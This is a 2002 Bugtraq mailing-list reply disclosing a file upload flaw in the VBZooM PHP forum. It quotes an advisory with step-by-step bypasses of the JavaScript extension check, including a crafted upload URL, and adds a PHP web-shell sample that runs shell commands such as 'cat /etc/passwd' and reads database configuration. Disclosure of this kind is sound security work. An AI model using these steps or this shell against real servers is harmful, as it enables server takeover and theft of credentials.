[27384] in bugtraq
Re: upload malicious file in VBZooM forums
daemon@ATHENA.MIT.EDU (M. Zeeshan Mustafa)
Thu Oct 10 15:53:52 2002
Content-Type: text/plain;
charset="iso-8859-1"
From: "M. Zeeshan Mustafa" <zolo@pk.bluesoft.us>
To: bugtraq@securityfocus.com
Date: Thu, 10 Oct 2002 01:34:22 +0600
In-Reply-To: <20021009152109.14683.qmail@mail.securityfocus.com>
MIME-Version: 1.0
Message-Id: <200210100134.22469.zolo@pk.bluesoft.us>
Content-Transfer-Encoding: 8bit
A damage could be alot more than assessed by hish in his last email, and not just
infecting the visitors of the forum, but a critical server risk.
For instance if an attacker makes a perl/php script of malicious code,
he could takeover the server with httpd-user id.
An attacker could create file with similar code below, and will upload
it with the extention .php ...
<?php
$cmd = "cat /etc/passwd"; // or
$cmd = "cat ".dirname($_SERVER['PATH_TRANSLATED'])."/path.to.database.headers"; // or
$cmd ="echo \"This is an example \">".dirname($_SERVER['PATH_TRANSLATED'])."/hacked";
$h = shell_exec($cmd);
echo $h;
?>
...and then he will call the url from his browser to execute the script...
http://host/forums/<attacker-file.php>
the said $cmd will execute.
Regards,
--
M. Zeeshan Mustafa
Software Security Specialist & Architect
E: security@zeeshan.net
C: +92(0)300-9249567
W: http://www.zeeshan.net
On Wednesday 09 October 2002 09:21 pm, hish _ hish wrote:
::::: Name: VBZooM
::::: Version Affected: tested on v1.01 maybe other version vulnerable also
::::: Severity: Critical
::::: Category: upload system
::::: Vendor URL: http://www.vbzoom.com
::::: Author: hish_hish <hish_hish565@hotmail.com>
::::: Date: discloused on 28th Aug 2002
::::: published at 8th oct 2002
:::::
::::: Description
::::: ***********
::::: VBZooM is bulletin board system which written in php,
::::: the problem lay on file upload system, the script uses JavaScript to check
::::: for valid extinsions.
::::: and you can bypass this check in two ways (see Details).
:::::
:::::
::::: Details
::::: *******
::::: there are two ways to bypass the JavaScript file extinsion check,
:::::
::::: 1st :
::::: you should be a member in the victim script,
::::: and go to make new subject, now save the page in your hard drive
::::: and remove the JavaScript code // at the last of the page
::::: and make some changes in <form action="add-subject.php ......>
::::: to <form action="http://victim/VBZoom/add-subject.php ....>
::::: now select your malicious file to upload it (should be .php)
::::: OK now hit submit bottom , the forum will redirect you to your subject
::::: douh :) your file waiting you as attachment :)
::::: NOTE : all visitor can see and use your uploaded file , so forget the 1st
::::: way and see 2nd: .
:::::
::::: 2nd:
:::::
::::: you dont need to be a member in victim forum , just follow me :) .
::::: http://www.victim.com/VBZooM/add-subject.php?Success=1
::::: &FileName=SourceFile&FileName_size=500&FileName_name=DistFile
::::: it will upload your file in "/download" directory.
::::: now execute your .php file
::::: http://www.victim.com/VBZooM/download/DistFile :))
:::::
:::::
::::: Fix Information
::::: ***************
::::: contact http://www.vbzoom.com
:::::
:::::
:::::
